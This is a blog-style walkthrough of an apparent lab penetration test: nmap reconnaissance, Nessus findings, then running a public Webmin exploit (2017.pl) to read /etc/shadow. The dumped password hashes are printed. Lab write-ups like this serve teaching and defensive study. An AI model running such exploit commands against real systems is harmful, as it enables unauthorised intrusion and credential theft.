root@bt:~# nmap -T4 -A -v 192.168.0.112 -O
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-01-30 22:50 WIT
NSE: Loaded 87 scripts for scanning.
NSE: Script Pre-scanning.
Initiating ARP Ping Scan at 22:50
Scanning 192.168.0.112 [1 port]
Completed ARP Ping Scan at 22:50, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 22:50
Completed Parallel DNS resolution of 1 host. at 22:50, 13.00s elapsed
Initiating SYN Stealth Scan at 22:50
Scanning 192.168.0.112 [1000 ports]
Discovered open port 139/tcp on 192.168.0.112
Discovered open port 80/tcp on 192.168.0.112
Discovered open port 445/tcp on 192.168.0.112
Discovered open port 22/tcp on 192.168.0.112
Discovered open port 10000/tcp on 192.168.0.112
Completed SYN Stealth Scan at 22:50, 0.12s elapsed (1000 total ports)
Initiating Service scan at 22:50
Scanning 5 services on 192.168.0.112
Completed Service scan at 22:50, 11.02s elapsed (5 services on 1 host)
Initiating OS detection (try #1) against 192.168.0.112
NSE: Script scanning 192.168.0.112.
Initiating NSE at 22:50
Completed NSE at 22:50, 1.08s elapsed
Nmap scan report for 192.168.0.112
Host is up (0.00054s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
| ssh-hostkey: 1024 e4:46:40:bf:e6:29:ac:c6:00:e2:b2:a3:e1:50:90:3c (DSA)
|_2048 10:cc:35:45:8e:f2:7a:a1:cc:db:a0:e8:bf:c7:73:3d (RSA)
80/tcp open http Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
|_http-title: Site doesn't have a title (text/html).
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
10000/tcp open http MiniServ 0.01 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-favicon: Unknown favicon MD5: 1F4BAEFFD3C738F5BEDC24B7B6B43285
MAC Address: 08:00:27:AA:EC:6D (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:kernel:2.6.22
OS details: Linux 2.6.22 (embedded, ARM)
Uptime guess: 0.089 days (since Mon Jan 30 20:42:49 2012)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=210 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:kernel
Host script results:
| nbstat:
| NetBIOS name: UBUNTUVM, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
| Names
| UBUNTUVM<00> Flags: <unique><active>
| UBUNTUVM<03> Flags: <unique><active>
| UBUNTUVM<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| MSHOME<1d> Flags: <unique><active>
| MSHOME<1e> Flags: <group><active>
|_ MSHOME<00> Flags: <group><active>
| smb-security-mode:
| Account that was used for smb scripts: guest
| User-level authentication
| SMB Security: Challenge/response passwords supported
|_ Message signing disabled (dangerous, but default)
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-os-discovery:
| OS: Unix (Samba 3.0.26a)
| Computer name: ubuntuvm
| Domain name: nsdlab
| FQDN: ubuntuvm.NSDLAB
| NetBIOS computer name:
|_ System time: 2012-01-31 05:50:43 UTC-6
TRACEROUTE
HOP RTT ADDRESS
1 0.54 ms 192.168.0.112
NSE: Script Post-scanning.
Initiating NSE at 22:50
Completed NSE at 22:50, 0.00s elapsed
Read data files from: /usr/local/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.46 seconds
Raw packets sent: 1020 (45.626KB) | Rcvd: 1532 (67.454KB)
2. There mention of open ports and services running
3. Take a look on port 80 and 10000. There are service running Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6) on port 80 and MiniServ 0.01 (Webmin httpd) on port 10000.
4. Try to check the browser
192.168.0.112:80
192.168.0.112:10000
5. Vulnerability Assesment with Nessus (sorry i can not include screenshots because there is a problem when taking pictures nessus)
Report of Nessus
PORT WWW (10000/TCP)
Plugin ID: 22300
Webmin / Usermin Null Byte Filtering Vulnerabilities
Synopsis
The remote web server is affected by multiple issues.
List of Hosts
192.168.0.112
Description
The remote host is running Webmin or Usermin, web-based interfaces for
Unix / Linux system administrators and end-users. Webmin and Usermin both come with the Perl script 'miniserv.pl' to
provide basic web services, and the version of 'miniserv.pl' installed
on the remote host fails to properly filter null characters from URLs.
An attacker may be able to exploit this to reveal the source code of CGI
scripts, obtain directory listings, or launch cross-site scripting
attacks against the affected application.
Solution
Upgrade to Webmin version 1.296 / Usermin 1.226 or later.
See also
Risk Factor
Medium/ CVSS Base Score: 6.8
(CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P)
CVSS Temporal Score: 6.5(CVSS2#E:F/RL:U/RC:C)
Bugtraq ID
Vulnerability publication date: 2006/09/01
Plugin publication date: 2006/09/02
Plugin last modification date: 2011/03/14
Ease of exploitability : Exploits are available
PORT CIFS (445/TCP)
Plugin ID: 57608
SMB Signing Disabled
Synopsis
Signing is disabled on the remote SMB server.
List of Hosts
192.168.0.112
Description
Signing is disabled on the remote SMB server. This can allow
man-in-the-middle attacks against the SMB server.
Solution
Enforce message signing in the host's configuration. On Windows,
this is found in the Local Security Policy. On Samba, the setting is
called 'server signing'. See the 'see also' links for further
details.
See also
Risk Factor
Medium/ CVSS Base Score: 5.0
(CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N)
Vulnerability publication date: 2012/01/17
Plugin publication date: 2012/01/19
Plugin last modification date: 2012/01/19
PORT WWW (80/TCP)
Plugin ID: 24260
HyperText Transfer Protocol (HTTP) Information
Synopsis
Some information about the remote HTTP configuration can be extracted.
List of Hosts
192.168.0.112
Plugin Output
6. Exploit using ExploitDB
Open terminal and type
root@bt:cd /pentest/exploits/exploitdb#
root@bt:/pentest/exploits/exploitdb# ./searchsploit webmin
8. Choose /multiple/remote/2017.pl
9. Move into the home folder
root@bt:/pentest/exploits/exploitdb# cp /multiple/remote/2017.pl /home
# Run the exploit
root@bt:/home# perl 2017.pl 192.168.0.112 10000 /etc/shadow 0
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 192.168.0.112 on port 10000!
FILENAME: /etc/shadow
FILE CONTENT STARTED
-----------------------------------
root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
daemon:*:14040:0:99999:7:::
bin:*:14040:0:99999:7:::
sys:*:14040:0:99999:7:::
sync:*:14040:0:99999:7:::
games:*:14040:0:99999:7:::
man:*:14040:0:99999:7:::
lp:*:14040:0:99999:7:::
mail:*:14040:0:99999:7:::
news:*:14040:0:99999:7:::
uucp:*:14040:0:99999:7:::
proxy:*:14040:0:99999:7:::
www-data:*:14040:0:99999:7:::
backup:*:14040:0:99999:7:::
list:*:14040:0:99999:7:::
irc:*:14040:0:99999:7:::
gnats:*:14040:0:99999:7:::
nobody:*:14040:0:99999:7:::
dhcp:!:14040:0:99999:7:::
syslog:!:14040:0:99999:7:::
klog:!:14040:0:99999:7:::
mysql:!:14040:0:99999:7:::
sshd:!:14040:0:99999:7:::
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::
-------------------------------------
No comments:
Post a Comment